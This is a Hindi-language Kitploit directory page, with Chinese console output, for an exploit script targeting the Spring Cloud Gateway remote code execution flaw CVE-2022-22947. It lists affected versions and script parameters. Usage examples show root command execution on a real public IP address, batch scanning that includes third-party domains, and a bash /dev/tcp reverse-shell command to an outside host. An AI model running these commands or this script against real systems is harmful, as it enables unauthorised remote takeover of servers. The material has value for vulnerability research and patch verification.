Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22947_EXP — एक स्क्रिप्ट जिसे अकेले या बैच में सत्यापित किया जा सकता है, और रिवर्स शेल भी प्राप्त कर सकती है। | Kitploit
उपकरण/GitHubGitHub/anansec/cve-2022-22947_exp
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

एक स्क्रिप्ट जिसे अकेले या बैच में सत्यापित किया जा सकता है, और रिवर्स शेल भी प्राप्त कर सकती है।

रिपॉजिटरी देखें
714 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

1. Spring Cloud Gateway दूरस्थ कोड निष्पादन भेद्यता

खतरे का स्तर: उच्च जोखिम

POC/EXP स्थिति: सार्वजनिक

CNVD क्रमांक: CNNVD-2022-16402

CVE क्रमांक: CVE-2022-22947

2. प्रभावित सीमा:

    • VMWare Spring Cloud GateWay 3.1.0
    • VMWare Spring Cloud GateWay >=3.0.0,<=3.0.6
    • VMWare Spring Cloud GateWay <3.0.0

3. भेद्यता का विवरण

Spring Cloud Gateway में एक दूरस्थ कोड निष्पादन भेद्यता मौजूद है। यह भेद्यता Spring Cloud Gateway एप्लिकेशन के Actuator एंडपॉइंट पर होती है, जो सक्षम, उजागर और असुरक्षित होने पर कोड इंजेक्शन हमलों के लिए असुरक्षित है। हमलावर इस भेद्यता का उपयोग दुर्भावनापूर्ण रूप से ऐसे अनुरोध बनाकर कर सकता है जो दूरस्थ होस्ट पर मनमाना कोड निष्पादन की अनुमति देते हैं।

4. CVE-2022-22947 EXP का उपयोग

(1) स्क्रिप्ट की विशेषताएँ

  1. एकल लक्ष्य सत्यापन का समर्थन करता है
  2. बैच भेद्यता सत्यापन का समर्थन करता है
  3. रिवर्स शेल का समर्थन करता है

(2) स्क्रिप्ट पैरामीटर

root@kitploit:~
-h    सहायता जानकारी देखें
-u    URL लक्ष्य निर्दिष्ट करें
-c    निष्पादित करने के लिए कमांड निर्दिष्ट करें, डिफ़ॉल्ट रूप से id निष्पादित करें
-f    लक्ष्य URL फ़ाइल निर्दिष्ट करें

(3) स्क्रिप्ट का उपयोग

1. एकल लक्ष्य सत्यापन

विधि 1:

root@kitploit:~
E:\pocs>python cve-2022-22947.py

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

请输入一个目标url地址:http://123.58.236.76:8484
请输入想要执行的命令,默认执行id:whoami
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']

विधि 2:

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']

2. बैच सत्यापन

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
[-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']

3. रिवर्स शेल

root@kitploit:~
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"

image-20220519233354807

image-20220519233429912

टूल डाउनलोड करें